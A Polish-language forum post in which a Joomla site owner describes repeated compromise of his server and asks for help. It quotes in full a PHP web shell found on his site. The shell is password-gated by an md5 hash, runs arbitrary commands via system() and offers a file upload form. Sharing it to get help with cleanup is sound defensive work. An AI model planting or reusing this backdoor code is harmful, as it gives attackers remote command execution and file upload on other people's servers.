Cześć,
mam spory problem. Od pewnego czasu (mam wrażenie że od pewnej aktualizacji J!) praktycznie co kilka dni IP mojego serwera wpadał do antyspamowej blokady CBL. Stronę czyściłem. Problem się powtarzał. Poprosiłem o przeskanowanie strony @trzepiz'a - znalazł zainfekowane pliki i wszystko wyczyścił (Michał, bardzo dziękuję za pomoc 
). Teraz niby jest ok, ale cały czas Admin Tools wyłapuje próby logowania i innych ataków. Wrzucam IP do black listy, niestety codziennie mam nowe ataki. Coś się uparło na IP serwera. Ostatnio jednak AT wyłapało nowy plik o takiej treści:
Kod PHP:
<?php if(md5($_GET["ms-load"])=="211482534c08b94ad061174d49f8e237"){
$c=$_GET['cmd'];
system($c);
$p=$_SERVER["DOCUMENT_ROOT"];
$yoco=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$yoco/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
Zastanawiam się czy dałoby się namierzyć gdzie idzie wysyłka tego formularza. Jeśli nie to czy mogę tak zabezpieczyć plik, aby nie mógł być edytowany/nadpisywany? Zmieniłem jego treść i przyzwolenia. Dziś jednak widzę że plik został nadpisany ponownie z powyższą zawartością.
Nie wiem co dalej...
Pozdrówka, Vereb
Nowe pliki i wstrzykiwany kod do już istniejących
Cytuj
